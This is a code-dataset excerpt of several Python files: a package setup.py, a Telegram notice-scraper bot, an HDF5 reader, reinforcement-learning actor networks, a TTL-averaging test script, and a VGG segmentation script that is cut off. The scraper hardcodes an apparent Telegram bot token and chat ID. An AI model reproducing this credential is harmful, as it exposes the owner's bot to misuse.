"usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 136, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 136, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 136, "usage_type": "name"}, {"api_name": "selenium.webdriver.common", "line_number": 138, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 138, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 160, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 167, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 173, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 177, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 178, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 178, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 178, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 178, "usage_type": "name"}, {"api_name": "selenium.webdriver.common", "line_number": 181, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 210, "usage_type": "call"}, {"api_name": "urllib.error", "line_number": 211, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 215, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 220, "usage_type": "call"}, {"api_name": "os.path", "line_number": 220, "usage_type": "attribute"}, {"api_name": "urllib.request.urlretrieve", "line_number": 224, "usage_type": "call"}, {"api_name": "urllib.error", "line_number": 225, "usage_type": "attribute"}, {"api_name": "urllib.error", "line_number": 229, "usage_type": "attribute"}]} {"seq_id": "152346558", "text": "\"\"\"\nThis file contains the current state of packaging in Python using\nDistribution Utilities (Distutils) and its extension from the end\nuser'point-of-view.\n\nDocumentation:\nhttps://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/introduction.html\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nPACKAGE = \"timst\"\n\n# Used for pytest and code coverage\nTESTS_REQUIEREMENTS = [\"pytest\", \"pytest-cov\"]\n# Depending on the documents more dependencies can be added\nDOCS_REQUIEREMENTS = [\"recommonmark\", \"sphinx_rtd_theme\", \"sphinxcontrib-bibtex\"]\n# Dependencies for the packages\nPACKAGE_REQUIEREMENTS = [\"numpy\", \"torch\", \"tqdm\", \"torchvision\"]\n\n# Read through Readme\ntry:\n this_directory = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\nexcept IOError:\n print(\"Read me file not found.\")\n\n\ndef get_version():\n \"\"\"Gets the version from the package's __init__ file\n if there is some 
problem, this fails.\n \"\"\"\n VERSIONFILE = os.path.join(\"src\", PACKAGE, \"__init__.py\")\n initfile_lines = open(VERSIONFILE, \"rt\").readlines()\n VSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n\n\nsetup(\n name=PACKAGE,\n version=get_version(),\n description=\"Image style transfer using Torch\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Tanjona R. Rabemananjara\",\n author_email=\"tanjona.rabemananjara@mi.infn.it\",\n url=\"https://github.com/Radonirinaunimi/Style-Transfer\",\n install_requires=PACKAGE_REQUIEREMENTS,\n extras_require={\"docs\": DOCS_REQUIEREMENTS, \"tests\": TESTS_REQUIEREMENTS},\n entry_points={\"console_scripts\": [\"timst = timst.run:main\", ]},\n package_dir={\"\": \"src\"},\n packages=find_packages(\"src\"),\n package_data={\"\": [\"logo/logo.png\"], },\n classifiers=[\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Physics\",\n ],\n setup_requires=[\"wheel\"],\n python_requires='>=3.6'\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "re.M", "line_number": 42, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 47, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 60, "usage_type": "call"}]} {"seq_id": "10839188", "text": "from bs4 import BeautifulSoup\nimport requests\nimport os\nimport telegram\n\nmy_token = '509374426:AAHLko_Iht5oulMOo8tBTAbd52vYyFL8GwU'\nbot = telegram.Bot(token=my_token)\nupdate = bot.get_updates()\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nreq = requests.get('http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\nreq.encoding = 'euc-kr'\n\nhtml = req.text\nsoup = BeautifulSoup(html, 'html.parser')\nposts = soup.select('div.article > div > table > tbody > tr > td.al > a')\nsave = posts[-1].text\n\n# for i in posts:ㅇ\n# # print(i)\n# print(i.text)\n\nwith open(os.path.join(BASE_DIR, 'cau.txt'), 'r+') as f_read:\n before = f_read.readline()\n if before != save:\n bot.sendMessage(chat_id='384222529', text='중앙대 편입학 새공지가 있습니다.')\n bot.sendMessage(chat_id='384222529', text='http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\n\n with open(os.path.join(BASE_DIR, 'cau.txt'), 'w+') as f_write:\n f_write.write(save)\n f_write.close()\n\n f_read.close()\n", "sub_path": "transfer_cau.py", "file_name": "transfer_cau.py", "file_ext": "py", "file_size_in_byte": 1072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "telegram.Bot", "line_number": 
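The transfer_cau.py scraper boils down to compare-and-update against a one-line state file, with a Telegram ping on change. A sketch of that step in isolation (detect_change and the notify callback are my names; the real script inlines this around bot.sendMessage):

import os

def detect_change(state_path, latest, notify):
    # Compare the newest scraped title with the stored one; notify and persist on change.
    previous = ''
    if os.path.exists(state_path):
        with open(state_path, 'r', encoding='utf-8') as fh:
            previous = fh.readline()
    if previous != latest:
        notify(latest)
        with open(state_path, 'w', encoding='utf-8') as fh:
            fh.write(latest)

# e.g. detect_change('cau.txt', save, lambda t: bot.sendMessage(chat_id='384222529', text=t))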
7, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} {"seq_id": "355522747", "text": "# -*- coding: utf-8 -*-\n\nimport os\n\nimport h5py\n\nfrom tvb_scripts.io.h5_writer import H5Writer\nfrom tvb_scripts.utils.log_error_utils import initialize_logger\n\n\nclass H5ReaderBase(object):\n logger = initialize_logger(__name__)\n\n H5_TYPE_ATTRIBUTE = H5Writer().H5_TYPE_ATTRIBUTE\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n H5_TYPES_ATTRUBUTES = [H5_TYPE_ATTRIBUTE, H5_SUBTYPE_ATTRIBUTE]\n\n def _open_file(self, name, path=None, h5_file=None):\n if h5_file is None:\n if not os.path.isfile(path):\n raise ValueError(\"%s file %s does not exist\" % (name, path))\n\n self.logger.info(\"Starting to read %s from: %s\" % (name, path))\n h5_file = h5py.File(path, 'r', libver='latest')\n return h5_file\n\n def _close_file(self, h5_file, close_file=True):\n if close_file:\n h5_file.close()\n\n def _log_success(self, name, path=None):\n if path is not None:\n self.logger.info(\"Successfully read %s from: %s\" % (name, path))\n\n\nclass H5GroupHandlers(object):\n H5_SUBTYPE_ATTRIBUTE = H5Writer().H5_SUBTYPE_ATTRIBUTE\n\n def read_dictionary_from_group(self, group, type=None):\n dictionary = dict()\n for dataset in group.keys():\n dictionary.update({dataset: group[dataset][()]})\n for attr in group.attrs.keys():\n dictionary.update({attr: group.attrs[attr]})\n if type is None:\n type = group.attrs[self.H5_SUBTYPE_ATTRIBUTE]\n else:\n return dictionary\n", "sub_path": "tvb_scripts/io/h5_reader_base.py", "file_name": "h5_reader_base.py", "file_ext": "py", "file_size_in_byte": 1535, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tvb_scripts.utils.log_error_utils.initialize_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 14, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 24, "usage_type": "call"}, {"api_name": "tvb_scripts.io.h5_writer.H5Writer", "line_number": 37, "usage_type": "call"}]} {"seq_id": "316572729", "text": "import torch\nimport torch.nn as nn\nfrom functools import reduce\n\nfrom catalyst.contrib.models import SequentialNet\nfrom catalyst.dl.initialization import create_optimal_inner_init, outer_init\nfrom catalyst.rl.agents.utils import normal_sample, normal_log_prob\nfrom catalyst.rl.agents.layers import StateNet, SquashingLayer, CouplingLayer\n\n# log_sigma of Gaussian policy are capped at (LOG_SIG_MIN, LOG_SIG_MAX)\nLOG_SIG_MAX = 2\nLOG_SIG_MIN = -10\n\n\nclass Actor(StateNet):\n \"\"\"\n Actor which learns deterministic policy.\n \"\"\"\n\n @classmethod\n def 
create_from_config(\n cls,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n dropout=None,\n norm_fn=None,\n bias=True,\n layer_order=None,\n residual=False,\n out_activation=None,\n memory_type=None,\n **kwargs\n ):\n assert len(kwargs) == 0\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n if isinstance(state_shape, int):\n state_shape = (state_shape, )\n\n if len(state_shape) in [1, 2]:\n # linear case: one observation or several one\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n observation_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n dropout=dropout,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias,\n layer_order=layer_order,\n residual=residual\n )\n elif len(state_shape) in [3, 4]:\n # cnn case: one image or several one @TODO\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n if memory_type == \"lama\":\n raise NotImplementedError\n elif memory_type == \"rnn\":\n raise NotImplementedError\n else:\n memory_net = None\n memory_out = hiddens[-1]\n\n head_net = SequentialNet(\n hiddens=[memory_out, action_size],\n layer_fn=nn.Linear,\n activation_fn=out_activation,\n norm_fn=None,\n bias=True\n )\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n observation_net.apply(inner_init)\n head_net.apply(outer_init)\n\n actor_net = cls(\n observation_net=observation_net,\n memory_net=memory_net,\n head_net=head_net\n )\n\n return actor_net\n\n\nclass GaussActor(nn.Module):\n \"\"\" Actor which learns mean and standard deviation of Gaussian\n stochastic policy. 
Actions obtained from the policy are squashed\n with (out_activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.policy_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=nn.Linear,\n activation_fn=None,\n norm_fn=None,\n bias=bias\n )\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.policy_net.apply(outer_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n x = self.policy_net.forward(x)\n\n mu, log_sigma = x[:, :self.n_action], x[:, self.n_action:]\n log_sigma = torch.clamp(log_sigma, LOG_SIG_MIN, LOG_SIG_MAX)\n sigma = torch.exp(log_sigma)\n z = normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi, mu, log_sigma\n return action\n\n\nclass RealNVPActor(nn.Module):\n \"\"\" Actor which learns policy based on Real NVP Bijector.\n Such policy transforms samples from N(z|0,I) into actions and\n then squashes them with (out activation).\n \"\"\"\n\n def __init__(\n self,\n state_shape,\n action_size,\n hiddens,\n layer_fn,\n activation_fn=nn.ReLU,\n norm_fn=None,\n bias=True,\n out_activation=nn.Sigmoid\n ):\n super().__init__()\n # hack to prevent cycle imports\n from catalyst.contrib.modules import name2nn\n\n self.n_action = action_size\n\n layer_fn = name2nn(layer_fn)\n activation_fn = name2nn(activation_fn)\n norm_fn = name2nn(norm_fn)\n out_activation = name2nn(out_activation)\n\n state_size = reduce(lambda x, y: x * y, state_shape)\n\n self.feature_net = SequentialNet(\n hiddens=[state_size] + hiddens,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=norm_fn,\n bias=bias\n )\n self.embedding_net = SequentialNet(\n hiddens=[hiddens[-1], action_size * 2],\n layer_fn=layer_fn,\n activation_fn=None,\n norm_fn=norm_fn,\n bias=bias\n )\n\n self.coupling1 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"odd\"\n )\n self.coupling2 = CouplingLayer(\n action_size=action_size,\n layer_fn=layer_fn,\n activation_fn=activation_fn,\n norm_fn=None,\n bias=bias,\n parity=\"even\"\n )\n\n self.squasher = SquashingLayer(out_activation)\n\n inner_init = create_optimal_inner_init(nonlinearity=activation_fn)\n self.feature_net.apply(inner_init)\n self.embedding_net.apply(inner_init)\n\n def forward(self, observation, with_log_pi=False):\n observation = observation.view(observation.shape[0], -1)\n x = observation\n x = self.feature_net.forward(x)\n state_embedding = self.embedding_net.forward(x)\n\n mu = torch.zeros((observation.shape[0], self.n_action)).to(x.device)\n sigma = torch.ones_like(mu).to(x.device)\n z = 
normal_sample(mu, sigma)\n log_pi = normal_log_prob(mu, sigma, z)\n z, log_pi = self.coupling1.forward(z, state_embedding, log_pi)\n z, log_pi = self.coupling2.forward(z, state_embedding, log_pi)\n action, log_pi = self.squasher.forward(z, log_pi)\n\n if with_log_pi:\n return action, log_pi\n return action\n", "sub_path": "rl/agents/actor.py", "file_name": "actor.py", "file_ext": "py", "file_size_in_byte": 7526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "catalyst.rl.agents.layers.StateNet", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 41, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 42, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 43, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 44, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 51, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 53, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 85, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.outer_init", "line_number": 87, "usage_type": "argument"}, {"api_name": "torch.nn.Module", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 98, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 110, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 121, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 122, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 123, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 124, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 126, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 128, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "catalyst.rl.agents.layers.SquashingLayer", "line_number": 142, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 144, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.outer_init", "line_number": 146, "usage_type": "argument"}, {"api_name": "torch.clamp", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 156, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_sample", "line_number": 157, "usage_type": "call"}, {"api_name": 
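Both stochastic actors rely on the same trick: sample from a Gaussian with clamped log-sigma, squash the sample, and correct log pi for the change of variables. For a tanh squasher the correction is sum(log(1 - tanh(z)^2)). A self-contained PyTorch sketch of that computation (independent of catalyst's SquashingLayer, which also supports other activations):

import torch

def squashed_gaussian_sample(mu, log_sigma):
    # Reparameterized sample from N(mu, sigma), squashed with tanh,
    # with the log-probability corrected for the change of variables.
    log_sigma = torch.clamp(log_sigma, -10, 2)   # same caps as LOG_SIG_MIN/LOG_SIG_MAX above
    sigma = log_sigma.exp()
    z = mu + sigma * torch.randn_like(mu)        # reparameterization trick
    log_pi = torch.distributions.Normal(mu, sigma).log_prob(z).sum(dim=-1)
    action = torch.tanh(z)
    # log|det da/dz| = sum log(1 - tanh(z)^2); epsilon keeps the log finite at saturation
    log_pi -= torch.log(1.0 - action.pow(2) + 1e-6).sum(dim=-1)
    return action, log_pi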
"catalyst.rl.agents.utils.normal_log_prob", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 166, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 166, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 181, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 181, "usage_type": "name"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 189, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 190, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 191, "usage_type": "call"}, {"api_name": "catalyst.contrib.modules.name2nn", "line_number": 192, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 194, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 196, "usage_type": "call"}, {"api_name": "catalyst.contrib.models.SequentialNet", "line_number": 203, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.CouplingLayer", "line_number": 211, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.CouplingLayer", "line_number": 219, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.layers.SquashingLayer", "line_number": 228, "usage_type": "call"}, {"api_name": "catalyst.dl.initialization.create_optimal_inner_init", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 241, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_sample", "line_number": 242, "usage_type": "call"}, {"api_name": "catalyst.rl.agents.utils.normal_log_prob", "line_number": 243, "usage_type": "call"}]} {"seq_id": "11075906", "text": "import argparse\r\nimport sys\r\nimport os\r\nimport functools\r\nimport random\r\nimport statistics\r\n\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom IPAlgorithm import radix\r\nimport IPAlgorithm.MultiSourceTimedFlowAlgorithm\r\n\r\nfrom pyshark.packet import layer\r\nclass LayerFieldsContainer(layer.LayerFieldsContainer):\r\n def __new__(cls, main_field, *args, **kwargs):\r\n if hasattr(main_field, 'get_default_value'):\r\n obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)\r\n else:\r\n obj = str.__new__(cls, main_field, *args, **kwargs)\r\n obj.fields = [main_field]\r\n return obj\r\nlayer.LayerFieldsContainer = LayerFieldsContainer\r\n\r\nTESTED_ASES = 10\r\n\r\ndef main(pickle_src, drop_rate, *args, **kwargs):\r\n packets, prefixes_set = IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap(None, pickle_src)\r\n prefixes = list(prefixes_set)\r\n extract = getattr(IPAlgorithm.MultiSourceTimedFlowAlgorithm.MultiSourceTimedFlowAlgorithm, '_extract_ttl_diff')\r\n\r\n prefix_radix = radix.Radix()\r\n for prefix in prefixes:\r\n rnode = prefix_radix.add(prefix.exploded)\r\n rnode.data[\"count\"] = 0\r\n rnode.data[\"packets\"] = []\r\n\r\n for packet in packets:\r\n rnode = prefix_radix.search_best(packet.src.exploded)\r\n if rnode is None:\r\n continue\r\n rnode.data[\"count\"]+=1\r\n flow = functools.reduce(lambda x, y: str(x) + '-' + str(y),\r\n [packet.src, packet.src_port, packet.dst, packet.dst_port], packet)\r\n rnode.data[\"packets\"].append({'flow':flow, 'hop' : 
extract(packet.ttl)})\r\n\r\n top = {k : k.data['packets'] for k in prefix_radix.nodes() if k in sorted(prefix_radix.nodes(), key=lambda n:n.data['count'], reverse=True)[:TESTED_ASES]}\r\n\r\n # Remove flows\r\n all_flows, averages = calc_averages(top)\r\n number_to_remove = int(drop_rate * len(all_flows))\r\n removed_flows = random.sample(all_flows, number_to_remove)\r\n for AS, packets in top.items():\r\n new_packets = list(filter(lambda p: p['flow'] not in removed_flows, packets))\r\n top[AS] = new_packets\r\n\r\n _, new_averages = calc_averages(top)\r\n\r\n packet_variance = statistics.variance([averages[AS][0] - new_averages[AS][0] for AS in top])\r\n flow_variance = statistics.variance([averages[AS][1] - new_averages[AS][1] for AS in top])\r\n\r\n print(\"Packet variance: %f, Flow variance: %f\"%(packet_variance, flow_variance))\r\n\r\n\r\ndef calc_averages(ASToPackets):\r\n # Calculate flows and averages\r\n averages = {}\r\n all_flows = set()\r\n for AS in ASToPackets:\r\n packets = ASToPackets[AS]\r\n flows = set()\r\n flows_to_ttl = {}\r\n for packet in packets:\r\n flow = packet['flow']\r\n flows.add(flow)\r\n if flow not in flows_to_ttl:\r\n flows_to_ttl[flow] = packet['hop']\r\n\r\n all_flows = all_flows.union(flows)\r\n packet_average = sum(map(lambda packet: (packet['hop']), packets)) / len(packets)\r\n flows_average = sum([flows_to_ttl[flow] for flow in flows_to_ttl]) / len(flows_to_ttl)\r\n averages[AS] = (packet_average, flows_average)\r\n\r\n return all_flows, averages\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('pickle_src', type=str)\r\n parser.add_argument('--drop_rate', type=float, default=0.5)\r\n\r\n args = parser.parse_args()\r\n main(**vars(args))\r\n", "sub_path": "Test and validation/test_average.py", "file_name": "test_average.py", "file_ext": "py", "file_size_in_byte": 3497, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "pyshark.packet.layer.LayerFieldsContainer", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyshark.packet.layer", "line_number": 14, "usage_type": "name"}, {"api_name": "pyshark.packet.layer.LayerFieldsContainer", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyshark.packet.layer", "line_number": 22, "usage_type": "name"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap", "line_number": 27, "usage_type": "call"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm", "line_number": 27, "usage_type": "attribute"}, {"api_name": "IPAlgorithm.MultiSourceTimedFlowAlgorithm", "line_number": 29, "usage_type": "attribute"}, {"api_name": "IPAlgorithm.radix.Radix", "line_number": 31, "usage_type": "call"}, {"api_name": "IPAlgorithm.radix", "line_number": 31, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 42, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 51, "usage_type": "call"}, {"api_name": "statistics.variance", "line_number": 58, "usage_type": "call"}, {"api_name": "statistics.variance", 
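The per-prefix counting in test_average.py hinges on longest-prefix matching: add registers a prefix, and search_best returns the most specific registered prefix covering an address. A tiny standalone illustration of that lookup, here using the py-radix package, which exposes the same add/search_best interface as the bundled IPAlgorithm.radix:

import radix  # pip install py-radix

rtree = radix.Radix()
for prefix in ("10.0.0.0/8", "10.1.0.0/16"):
    node = rtree.add(prefix)
    node.data["count"] = 0

# Longest-prefix match: 10.1.2.3 hits the /16, 10.9.9.9 falls back to the /8.
for addr in ("10.1.2.3", "10.9.9.9"):
    node = rtree.search_best(addr)
    node.data["count"] += 1
    print(addr, "->", node.prefix)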
"line_number": 59, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 87, "usage_type": "call"}]} {"seq_id": "598843195", "text": "import multiprocessing\nimport re\nimport os.path\nimport tensorflow as tf\nimport helper2_bev\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\nfrom glob import glob\nimport numpy as np\nfrom skimage import io\nfrom skimage.transform import rescale, resize, downscale_local_mean\nimport cv2\nimport scipy.misc\nfrom PIL import Image\nimport random\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n image_input = tf.get_default_graph().get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = 